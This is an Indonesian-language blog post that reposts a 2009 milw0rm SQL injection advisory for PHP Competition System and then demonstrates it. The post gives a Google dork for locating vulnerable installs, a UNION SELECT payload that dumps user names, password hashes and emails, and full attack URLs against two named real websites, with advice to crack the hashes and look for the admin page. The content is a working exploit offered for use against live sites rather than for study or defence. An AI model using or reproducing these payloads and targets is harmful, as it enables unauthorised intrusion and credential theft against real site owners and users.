hehe jalan di willworm nemu ini :
###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability ( show_matchs.php competition )
##
## PHP Competition System BETA <= V0.84
##
## http://phpcompet.free.fr/
##
## http://phpcompet.free.fr/download_en.html
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME : WwW.55a.NeT
##
## Email : SQL@Hotmail.iT
##
########################
########################
##
## -[[: Exploite :]]-
##
## www.TraGeT.CoM/PATH/show_matchs.php?competition=1&season=1&day=-1+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,CONCAT_WS(0x3a,name,passwd,email),0,0,0,0+from+pcs_users--
## www.TraGeT.CoM/PATH/persons.php?pageno=0'
##
########################
########################
You can to find other vulne in other files :))
#########################################################################################################
#########################################################################################################
-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
:: HaCkEr_EGy :: Dark MaSTer :: His0k4 :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::
#########################################################################################################
#########################################################################################################
# milw0rm.com [2009-08-14]
nah yuk kita coba : TT
ini sebenarnya termasuk bugs lama banged...cuman masih ada kok yang vurln ^_^
ok gak usah lama - lama yach ...
masukin dorks google :
allinurl:show_matchs.php?competition=1
sebagai contoh gw coba 2 situs xixiixxi
http://sportmadesimple.com/lms/show_matchs.php?competition=1&season=18
nah kita tinggal masukin exploitnah ..
&season=1&day=-1+union+select+1,2,3,4,5,6,7,8,9,10,CONCAT_WS%280x3a,name,passwd,email%29,1,2,3,4+from+pcs_users--
di belakang
1&season=
hingga menjadi :
http://sportmadesimple.com/lms/show_matchs.php?competition=1&season=1&day=-1+union+select+1,2,3,4,5,6,7,8,9,10,CONCAT_WS%280x3a,name,passwd,email%29,1,2,3,4+from+pcs_users--
hehehe keliatan ntuh tinggal nyari page admin aja , jangan lupa di crack dulu yah...
nyari page admin udeh ane bahas di sini ok !
ini atu lagi uat coba-coba :P
http://hanoifootball.com/show_matchs.php?competition=1&season=1&day=-1+union+select+1,2,3,4,5,6,7,8,9,10,CONCAT_WS%280x3a,name,passwd,email%29,1,2,3,4+from+pcs_users--
special thx to : milworm, valcom87
0 ^Rumpian[!]:
Posting Komentar